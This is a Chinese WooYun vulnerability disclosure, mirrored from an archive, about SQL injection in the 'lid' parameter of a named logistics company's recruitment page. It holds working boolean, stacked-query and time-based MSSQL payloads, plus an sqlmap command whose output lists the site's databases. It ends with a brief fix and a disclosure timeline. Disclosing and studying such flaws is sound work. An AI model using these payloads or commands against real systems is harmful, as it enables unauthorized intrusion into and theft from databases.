乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-11-09: 厂商已经主动忽略漏洞,细节向公众公开
某物流公司主站注入漏洞oa和bbs在同一数据库下
注入点:
http://www.uc56.com:80/cn/job/recruitments
注入方式:
post
post数据:
keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1&tid=
注入参数:
lid
Payload:
keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-9789' OR (9790=9790) AND 'WeDl'='WeDl&tid=
root@hack[x:\sqlmap]# sqlmap.py -u "http://www.uc56.com:80/cn/job/recruitments" --data "keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1&tid=" -p "lid" --level 2 --risk 2 --hex --threads 6 -v 3 --dbms "mssql" --dbs
---Place: POSTParameter: lid Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-9789' OR (9790=9790) AND 'WeDl'='WeDl&tid= Vector: OR ([INFERENCE]) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1'; WAITFOR DELAY '0:0:5'--&tid= Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1' WAITFOR DELAY '0:0:5'--&tid= Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-----web server operating system: Windowsweb application technology: ASP.NET 4.0.30319back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] *[*] 0x6d0061007300740[*] \cOa[*] model[*] msdb[*] SYSUNC[*] tempdb[*] ucbbs[*] UcSoa[*] ucwebsqlmap identified the following injection points with a total of 0 HTTP(s) requests:
根据 lid 参数的类型做对应的过滤
未能联系到厂商或者厂商积极拒绝